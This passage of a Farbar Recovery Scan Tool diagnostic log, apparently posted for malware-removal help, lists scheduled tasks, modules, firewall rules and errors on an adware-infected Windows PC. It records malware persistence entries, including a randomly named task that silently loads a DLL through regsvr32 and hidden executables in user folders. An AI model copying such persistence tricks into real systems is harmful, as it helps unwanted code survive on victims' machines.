Task: {4F29E9B1-2C5E-48D6-B1CC-28BE34A02D38} - System32\Tasks\RegCure Pro Startup => C:\Program Files (x86)\ParetoLogic\RegCure Pro\RegCurePro.exe [2016-07-26] (ParetoLogic, Inc.) <==== ATTENTION
Task: {50477B8D-CADF-46BB-A215-F86BB96C6A82} - System32\Tasks\YTDownloader => C:\Program Files (x86)\YTDownloader\YTDownloader.exe [2015-10-22] (YTDownloader) <==== ATTENTION
Task: {52CD9B93-F461-41BB-B4D3-375417CBE947} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => %SystemRoot%\ehome\mcupdate.exe
Task: {57E7627E-4AA0-4C68-A307-EAA683AE803F} - System32\Tasks\ParetoLogic Update Version3_triggeronce => c:\program files (x86)\common files\paretologic\uus3\Pareto_Update3.exe [2016-07-26] () <==== ATTENTION
Task: {5840CBCE-7F77-411E-B033-1C1AF189ADB5} - \1f308483-1a6e-493d-ae8f-5dd8634c5004-4 -> No File <==== ATTENTION
Task: {5888B29F-A4A4-4A01-83F0-070CAD86847C} - System32\Tasks\SpeedyPC Update Version3 Startup Task => C:\Program Files (x86)\Common Files\SpeedyPC Software\UUS3\SpeedyPC_Update3.exe [2016-05-06] (SpeedyPC Software) <==== ATTENTION
Task: {58BFE8A7-F663-453E-8A1F-E93845F9ED7B} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => %SystemRoot%\ehome\ehPrivJob.exe
Task: {69480AF7-F603-4EA8-8F93-EA6B8C01E138} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {695CE9AD-D705-4749-BE09-14AD8276A181} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {69872E59-9BA5-40D1-B0BE-ACAFDCCEA4B4} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-03] (Google Inc.)
Task: {69960CBC-066B-492F-92D0-642850A25C91} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => %SystemRoot%\ehome\ehrec.exe
Task: {71EC2095-579C-4D26-BDFF-A0D61301B61B} - System32\Tasks\DriverRestore_ScheduledScan => C:\Program Files (x86)\DriverRestore\DriverRestore.exe [2015-10-09] () <==== ATTENTION
Task: {766E1EC9-58D6-40FB-BAC5-6BD45B994FC5} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {7AA2534A-D974-4476-811A-C42210045BF5} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => %SystemRoot%\ehome\ehPrivJob.exe
Task: {7C7A4D0B-9DDE-4325-B5C5-1EF7F85C990C} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => %SystemRoot%\ehome\ehPrivJob.exe
Task: {7C850FA5-31EF-4BA8-9BC9-ED025E5A2DA0} - System32\Tasks\YTDownloaderUpd => C:\Program Files (x86)\YTDownloader\updater.exe [2015-10-22] (Goobzo) <==== ATTENTION
Task: {7F064198-2C66-4EA3-8B38-FFFCD6574F3C} - System32\Tasks\HPCustParticipation HP Deskjet 1510 series => C:\Program Files\HP\HP Deskjet 1510 series\Bin\HPCustPartic.exe [2014-03-06] (Hewlett-Packard Co.)
Task: {8152AE6D-A0D3-41F0-8EEF-5C1CEBACE194} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => %SystemRoot%\ehome\ehPrivJob.exe
Task: {84780F38-B4EB-43A1-9629-5DCE4E9AB282} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => %SystemRoot%\ehome\mcupdate.exe
Task: {85673AE0-5544-418A-8E2B-5B6124E2D5C5} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - Randy) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe [2016-07-25] (Slimware Utilities Holdings, Inc.)
Task: {86B70693-6EF6-4BC0-B4E4-2BAFCFC8A380} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => %SystemRoot%\ehome\ehPrivJob.exe
Task: {886B215D-DE34-41B6-9B36-980D6CD813DA} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => %SystemRoot%\ehome\ehPrivJob.exe
Task: {89FF84C6-2FF3-4ADC-9311-2162837E1C22} - \Microsoft\Windows\Setup\GWXTriggers\Logon-URT -> No File <==== ATTENTION
Task: {8E1B5CDF-2E7C-4113-AA88-455CCBFD95E8} - System32\Tasks\SpeedyPC Update Version3 => C:\Program Files (x86)\Common Files\SpeedyPC Software\UUS3\SpeedyPC_Update3.exe [2016-05-06] (SpeedyPC Software) <==== ATTENTION
Task: {934CAF6C-AD19-40B5-8ACE-AC40D21BBF28} - System32\Tasks\{0532BE32-87D9-B0CA-75BD-6DEE5839A94C} => Regsvr32.exe /s /n /I:"/rt" "C:\PROGRA~3\261dc3b1\57c348f3.dll" <==== ATTENTION
Task: {9C4D00C3-36F0-4AD8-AA88-D81BD96CB286} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => %SystemRoot%\ehome\ehPrivJob.exe
Task: {A433E40E-B066-4216-A8FB-2E412069CE29} - System32\Tasks\SpeedyBackup Startup => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe [2016-05-06] () <==== ATTENTION
Task: {B1619F2B-5CE9-4EC5-A3E5-FD048FF487E4} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {B50180C3-D1CB-40B2-B2B1-54E45CD02F3A} - System32\Tasks\DriverUpdate Startup => C:\Program Files (x86)\DriverUpdate\DriverUpdate.exe [2016-07-12] (SlimWare Utilities, Inc.)
Task: {B6996A21-76AB-416B-AA92-28E5F3BE2033} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2011-09-09] (Hewlett-Packard Company)
Task: {B7731159-01AA-4BAF-8508-D5D744AB61D2} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> No File <==== ATTENTION
Task: {B7F72EBE-9D32-4E20-BDB1-4619D96DE4F3} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater\HPSFUpdater.exe [2011-06-14] (Hewlett-Packard)
Task: {C216AA13-E019-42DD-A9E0-2D1D90DE4271} - System32\Tasks\Nubopo => C:\PROGRA~1\SHOPPE~1\Fifahabj.bat <==== ATTENTION
Task: {C3E1600C-F551-47EE-A87D-2D0A63FB4B85} - System32\Tasks\ProfessionalCleaningSoftware_Start => C:\Program Files (x86)\Professional Cleaning Software\ProfessionalCleaningSoftware.exe <==== ATTENTION
Task: {C6518B78-A01B-4FE6-8AF0-38C0BBF48E58} - \SwiftSearch Auto Updater 1.10.0.25 Pending Update -> No File <==== ATTENTION
Task: {C844537A-90FC-4E70-A002-7676A2FB0F3C} - System32\Tasks\ParetoLogic Registration3 => Rundll32.exe "C:\Program Files (x86)\Common Files\ParetoLogic\UUS3\UUS3.dll" RunUns
Task: {CA12805D-100F-4DA6-A1C6-C1596CB06EFB} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Total Care Tune-Up => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPTuneUp.exe [2011-03-22] (Hewlett-Packard Company)
Task: {CA97BF34-BF75-41A0-8DAC-F922E12F0885} - System32\Tasks\DriverUpdate Scan => C:\Program Files (x86)\DriverUpdate\DriverUpdate.exe [2016-07-12] (SlimWare Utilities, Inc.)
Task: {CDA7EB4B-1611-4B3F-9BA4-65E0A908AFBC} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Tuneup => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2011-09-09] (Hewlett-Packard Company)
Task: {D56D93D7-2643-4711-BC5B-EC4D1D134106} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-12-17] (Adobe Systems Incorporated)
Task: {D6F2BC1F-773E-4624-9FAA-578BE389CD0E} - System32\Tasks\SpeedyBackup reigistration schedule => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe [2016-05-06] () <==== ATTENTION
Task: {DD0243AE-03D0-4301-9193-C573516754AE} - System32\Tasks\DriverRestore_DailyScan => C:\Program Files (x86)\DriverRestore\DriverRestore.exe [2015-10-09] () <==== ATTENTION
Task: {E1DEA695-EE7F-4FB6-A4F0-EB278B1FD47B} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {E3D6EAF9-10D2-4AF2-9D0C-D7FA4E597F51} - System32\Tasks\SpeedFixToolPro_Start => C:\Program Files (x86)\Speed Fix Tool Pro\SpeedFixToolPro.exe
Task: {E6542D06-DBEF-4690-A07E-F59316EEB423} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {E65B1D5D-80F9-495A-8AD1-50259E5AE989} - System32\Tasks\LaunchPreSignup => C:\Program Files (x86)\OLBPre\OLBPre.exe <==== ATTENTION
Task: {E67B64B5-D8A4-4EEC-A056-719D3EC8D454} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => %SystemRoot%\ehome\ehPrivJob.exe
Task: {E6FB393C-54B6-49CD-B343-6854CCC2D2D9} - System32\Tasks\{675E60C1-E04C-4593-80CC-CB005468CE68} => pcalua.exe -a "C:\Program Files (x86)\JZIP\JZIP\Uninstall.exe"
Task: {E730974E-3C79-4045-9280-75EA6B86045D} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {EC184D75-3E15-4739-A559-D85058183580} - System32\Tasks\ParetoLogic Update Version3 => c:\program files (x86)\common files\paretologic\uus3\Pareto_Update3.exe [2016-07-26] () <==== ATTENTION
Task: {F2EF1CA8-784E-427A-A1D4-97AEB2EB4A85} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {FA4F0A0E-8234-469C-B0EB-2375D63F521A} - \Inst_Rep -> No File <==== ATTENTION
Task: {FAD76473-D2B8-4544-ACE9-4593FE1CB480} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => %SystemRoot%\ehome\ehPrivJob.exe
Task: {FB5B3AE1-116E-45A5-A278-B866156DEE5F} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-01-20] (Adobe Systems Incorporated)
Task: {FE60A7D5-891A-4990-8157-59ED66DE4E7B} - System32\Tasks\RegCure Pro_sch_65E42BB8-5DED-11E6-93CB-74E543244A4E => C:\Program Files (x86)\ParetoLogic\RegCure Pro\RegCurePro.exe [2016-07-26] (ParetoLogic, Inc.) <==== ATTENTION
Task: {FFCE8EEA-7117-44A9-8BD4-0C6EA5CEE61E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\CRWKRUVUBYBCAXNB.job => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\DriverUpdate Scan.job => C:\Program Files (x86)\DriverUpdate\DriverUpdate.exe
Task: C:\WINDOWS\Tasks\DriverUpdate Startup.job => C:\Program Files (x86)\DriverUpdate\DriverUpdate.exe
Task: C:\WINDOWS\Tasks\NNKcNIsK9b1hl0VgyglYTRwSD.job => C:\Users\Randy\AppData\Roaming\NNKcNIsK9b1hl0VgyglYTRwSD.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\ParetoLogic Registration3.job => rundll32.exe C:\Program Files (x86)\Common Files\ParetoLogic\UUS3\UUS3.dll <==== ATTENTION
Task: C:\WINDOWS\Tasks\ParetoLogic Update Version3.job => c:\program files (x86)\common files\paretologic\uus3\Pareto_Update3.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\ParetoLogic Update Version3_triggeronce.job => c:\program files (x86)\common files\paretologic\uus3\Pareto_Update3.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\RegCure Pro Startup.job => C:\Program Files (x86)\ParetoLogic\RegCure Pro\RegCurePro.exe C:\Program Files (x86)\ParetoLogic\RegCure Pro\RegCurePro.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\RegCure Pro_sch_65E42BB8-5DED-11E6-93CB-74E543244A4E.job => C:\Program Files (x86)\ParetoLogic\RegCure Pro\RegCurePro.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\SlimCleaner Plus (Scheduled Scan - Randy).job => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe
Task: C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule startup.job => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe
Task: C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule.job => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe
Task: C:\WINDOWS\Tasks\SpeedyBackup Startup.job => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe
Task: C:\WINDOWS\Tasks\SpeedyPC Update Version3 Startup Task.job => C:\Program Files (x86)\Common Files\SpeedyPC Software\UUS3\SpeedyPC_Update3.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\SpeedyPC Update Version3.job => C:\Program Files (x86)\Common Files\SpeedyPC Software\UUS3\SpeedyPC_Update3.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
Task: C:\WINDOWS\Tasks\UpdateTask.job => C:\Users\Randy\AppData\Local\{3A700~1\UNINST~1.EXE
Task: C:\WINDOWS\Tasks\{4E20A085-1B30-164D-0726-6688F373B3A8}.job => C:\Users\Randy\AppData\Local\{3A700~1\UNINST~1.EXE <==== ATTENTION

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2012-02-10 00:01 - 2012-02-10 00:01 - 00073728 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Container.Wlan.dll
2016-07-25 16:35 - 2016-07-25 16:35 - 00763072 _____ () C:\Program Files\SlimService\MyDefragDll.dll
2015-10-29 23:18 - 2015-10-29 23:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-07-21 08:33 - 2016-06-30 20:48 - 02656408 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-07-21 08:33 - 2016-06-30 20:48 - 02656408 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-05-28 16:42 - 2016-05-28 16:42 - 00959168 _____ () C:\Users\Randy\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64\ClientTelemetry.dll
2016-02-02 09:45 - 2016-02-02 09:45 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-07-21 08:38 - 2016-06-30 19:48 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-07-21 08:34 - 2016-06-30 19:27 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-07-21 08:34 - 2016-06-30 19:21 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-07-21 08:34 - 2016-06-30 19:22 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-07-21 08:34 - 2016-06-30 19:24 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-01-04 18:33 - 2016-01-04 18:33 - 00913920 _____ () C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe
2016-04-25 20:47 - 2016-04-25 20:53 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2016-05-06 14:05 - 2016-05-06 14:05 - 00093344 _____ () C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupServicePS.dll
2016-05-28 16:42 - 2016-05-28 16:42 - 00679624 _____ () C:\Users\Randy\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\ClientTelemetry.dll
2015-11-04 15:23 - 2015-11-04 15:23 - 45161472 _____ () C:\Program Files (x86)\NowUSeeItPlayer\libcef.dll
2015-12-23 13:08 - 2015-12-23 13:08 - 01795072 _____ () C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.dll
2016-02-15 14:44 - 2016-01-26 00:15 - 02160640 _____ () C:\Users\Randy\AppData\Local\Chromium\Application\50.0.2632.0\libglesv2.dll
2016-02-15 14:44 - 2016-01-26 00:15 - 00075776 _____ () C:\Users\Randy\AppData\Local\Chromium\Application\50.0.2632.0\libegl.dll
2015-11-04 13:31 - 2015-11-04 13:31 - 01495040 _____ () C:\Program Files (x86)\NowUSeeItPlayer\libglesv2.dll
2015-11-04 13:33 - 2015-11-04 13:33 - 00074752 _____ () C:\Program Files (x86)\NowUSeeItPlayer\libegl.dll
2016-04-25 20:47 - 2016-04-25 20:53 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2016-04-25 20:47 - 2016-04-25 20:53 - 22284800 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkyWrap.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\WINDOWS\system32\Drivers\vwcgkjth.sys:changelist [7486]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\...\driversupport.com -> hxxp://apps.driversupport.com
IE trusted site: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\...\driversupport.com -> hxxps://apps.driversupport.com

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 18:34 - 2016-02-29 07:25 - 00000768 ____A C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1 localhost

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Randy\Pictures\2013-11-11 mp3 pics\mp3 pics 094.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => LPort=139
FirewallRules: [MSMQ-In-TCP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => LPort=808
FirewallRules: [{5096E3C2-805A-4E88-A4A3-13545B4D1190}] => C:\Program Files (x86)\Common Files\AOL\System Information\sinf.exe
FirewallRules: [{4A38DA32-F01E-4E5A-BF43-C33E19F602A9}] => C:\Program Files (x86)\Common Files\AOL\System Information\sinf.exe
FirewallRules: [{72B049A4-A1AD-424F-B207-83EB45FE4FA1}] => C:\Program Files (x86)\Common Files\AOL\Loader\aolload.exe
FirewallRules: [{C0694437-3E6B-48E6-BAE8-1DD7754607E2}] => C:\Program Files (x86)\Common Files\AOL\Loader\aolload.exe
FirewallRules: [{8C5854C9-2B87-484B-A7CE-DF5FD39FD80F}] => C:\Program Files (x86)\Common Files\AOL\TopSpeed\3.0\aoltpsd3.exe
FirewallRules: [{C1910A3B-1FF1-4A15-BD5C-7B63E54864BA}] => C:\Program Files (x86)\Common Files\AOL\TopSpeed\3.0\aoltpsd3.exe
FirewallRules: [{25AC17DB-848F-4C5B-BFA1-EE136038C5B0}] => C:\Program Files (x86)\AOL Desktop 9.8.2\waol.exe
FirewallRules: [{D82713E1-5DF2-4A9C-89ED-CD6BC635029B}] => C:\Program Files (x86)\AOL Desktop 9.8.2\waol.exe
FirewallRules: [{05C38E86-D970-43B3-B9E5-CE335017994D}] => C:\Program Files (x86)\Common Files\AOL\1454013173\ee\aolsoftware.exe
FirewallRules: [{B9E57A2A-6FD0-4298-9FDD-48B32A87D5C4}] => C:\Program Files (x86)\Common Files\AOL\1454013173\ee\aolsoftware.exe
FirewallRules: [{AF46B9A0-0569-45DA-B9B7-D8C3BCA025FE}] => C:\Program Files (x86)\Common Files\AOL\acs\AOLacsd.exe
FirewallRules: [{9A79DE3D-535B-4630-B408-156475E34583}] => C:\Program Files (x86)\Common Files\AOL\acs\AOLacsd.exe
FirewallRules: [{EB084F55-B942-4682-88DB-6148A03F24A3}] => C:\Program Files (x86)\Common Files\AOL\acs\AOLDial.exe
FirewallRules: [{4B5A63AD-E187-4258-B0D6-7F9854C34707}] => C:\Program Files (x86)\Common Files\AOL\acs\AOLDial.exe
FirewallRules: [UDP Query User{74C217E7-4A71-4B7C-B1C0-7F4F2A476D6F}C:\program files (x86)\premieropinion\pmropn.exe] => C:\program files (x86)\premieropinion\pmropn.exe
FirewallRules: [TCP Query User{51F0DA7E-9ACF-4E1F-AAFE-1D8E388182E7}C:\program files (x86)\premieropinion\pmropn.exe] => C:\program files (x86)\premieropinion\pmropn.exe
FirewallRules: [{0A265467-EB47-4D4F-B21E-557F71FBC74D}] => C:\Program Files\HP\HP OfficeJet 3830 series\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [{4B048853-1439-4C34-B69F-4F94735906B0}] => LPort=5357
FirewallRules: [{C48CB5AF-96E1-4714-989C-D63918A32561}] => C:\Program Files\HP\HP OfficeJet 3830 series\Bin\DeviceSetup.exe
FirewallRules: [{BB94FFB5-0DF3-484E-B388-3E742A7E3942}] => C:\Program Files\HP\HP OfficeJet 3830 series\bin\FaxPrinterUtility.exe
FirewallRules: [{8D8EA2DE-6C99-4A3D-A12D-12AE07960DA2}] => C:\Program Files\HP\HP OfficeJet 3830 series\bin\SendAFax.exe
FirewallRules: [{5FFB78F9-B102-4DA7-9620-3B31FB3D23BE}] => C:\Program Files\HP\HP OfficeJet 3830 series\bin\DigitalWizards.exe
FirewallRules: [{EEF9F1BC-D009-4B39-9345-8ABECDD897A8}] => C:\Program Files\HP\HP OfficeJet 3830 series\bin\FaxApplications.exe
FirewallRules: [{F65943E6-3AF8-4E73-A7B3-0B0E5F88AA10}] => C:\Users\Randy\AppData\Local\Temp\7zS377E\HP.EasyStart.exe
FirewallRules: [{CE668E86-3CBC-4A89-B046-A191EFF34DD8}] => C:\Windows\system32\rundll32.exe
FirewallRules: [UDP Query User{EE1005F2-20B4-4EFC-B3FE-C75EFC07FF0A}C:\program files (x86)\internet explorer\iexplore.exe] => C:\program files (x86)\internet explorer\iexplore.exe
FirewallRules: [TCP Query User{8CC323F6-7013-42FF-8CCD-45648B4D4B69}C:\program files (x86)\internet explorer\iexplore.exe] => C:\program files (x86)\internet explorer\iexplore.exe
FirewallRules: [{2DFAFEAB-B453-4575-9717-0A2B673A57B5}] => C:\Program Files\HP\HP Deskjet 1510 series\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [{2A79706E-F012-45D5-BE8E-0AFE79CA93C5}] => C:\Program Files\HP\HP Deskjet 1510 series\Bin\USBSetup.exe
FirewallRules: [{B7892689-DB82-4260-92E6-93E162A44F5E}] => C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{96A65B45-9398-4660-8E2F-AB4CE5ACDF84}] => C:\Users\Randy\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [{A6749190-EAEF-4BB3-8A29-5137010676ED}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

08-08-2016 22:31:58 RegCure Pro Backup
12-11-2016 19:33:46 Windows Update
12-11-2016 19:35:27 Windows Update

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (11/29/2016 06:48:22 AM) (Source: ATIeRecord) (EventID: 16396) (User: )
Description: ATI EEU PnP start/stop failed

Error: (11/29/2016 06:48:14 AM) (Source: ATIeRecord) (EventID: 16396) (User: )
Description: ATI EEU PnP start/stop failed

Error: (11/12/2016 10:37:16 PM) (Source: ATIeRecord) (EventID: 16396) (User: )
Description: ATI EEU PnP start/stop failed

Error: (11/12/2016 10:37:12 PM) (Source: ATIeRecord) (EventID: 16396) (User: )
Description: ATI EEU PnP start/stop failed

Error: (11/12/2016 08:40:02 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: There are currently no active network connections. Background Intelligent Transfer Service (BITS) will try again when an adapter is connected.

Error: (11/12/2016 08:36:45 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: HP-RRR)
Description: Activation of app Microsoft.Windows.Photos_8wekyb3d8bbwe!App failed with error: -2147023170 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (11/12/2016 08:35:15 PM) (Source: ATIeRecord) (EventID: 16396) (User: )
Description: ATI EEU PnP start/stop failed

Error: (11/12/2016 08:35:06 PM) (Source: ATIeRecord) (EventID: 16396) (User: )
Description: ATI EEU PnP start/stop failed

Error: (11/12/2016 08:28:25 PM) (Source: ATIeRecord) (EventID: 16396) (User: )
Description: ATI EEU PnP start/stop failed

Error: (11/12/2016 08:26:51 PM) (Source: ATIeRecord) (EventID: 16396) (User: )
Description: ATI EEU PnP start/stop failed


System errors:
=============
Error: (02/10/2017 09:45:31 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The User Data Access_1da072a service terminated with the following error:
Unable to complete the requested operation because of either a catastrophic media failure or a data structure corruption on the disk.

Error: (02/10/2017 09:20:19 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The User Data Access_1da072a service terminated with the following error:
Class not registered

Error: (02/10/2017 09:16:08 PM) (Source: BTHUSB) (EventID: 17) (User: )
Description: The local Bluetooth adapter has failed in an undetermined manner and will not be used. The driver has been unloaded.

Error: (11/29/2016 06:48:13 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_1794d91 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (11/12/2016 10:37:12 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_219ab2 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (11/12/2016 08:35:11 PM) (Source: DCOM) (EventID: 10010) (User: HP-RRR)
Description: The server {0002DF02-0000-0000-C000-000000000046} did not register with DCOM within the required timeout.

Error: (11/12/2016 08:35:08 PM) (Source: DCOM) (EventID: 10010) (User: HP-RRR)
Description: The server {260EB9DE-5CBE-4BFF-A99A-3710AF55BF1E} did not register with DCOM within the required timeout.

Error: (11/12/2016 08:35:07 PM) (Source: DCOM) (EventID: 10010) (User: HP-RRR)
Description: The server {260EB9DE-5CBE-4BFF-A99A-3710AF55BF1E} did not register with DCOM within the required timeout.

Error: (11/12/2016 08:35:06 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_33958 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (11/12/2016 08:33:55 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the HPWMISVC service.


CodeIntegrity:
===================================
Date: 2017-02-10 21:52:27.004
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-10 21:52:26.969
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-10 21:52:26.908
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-10 21:52:26.680
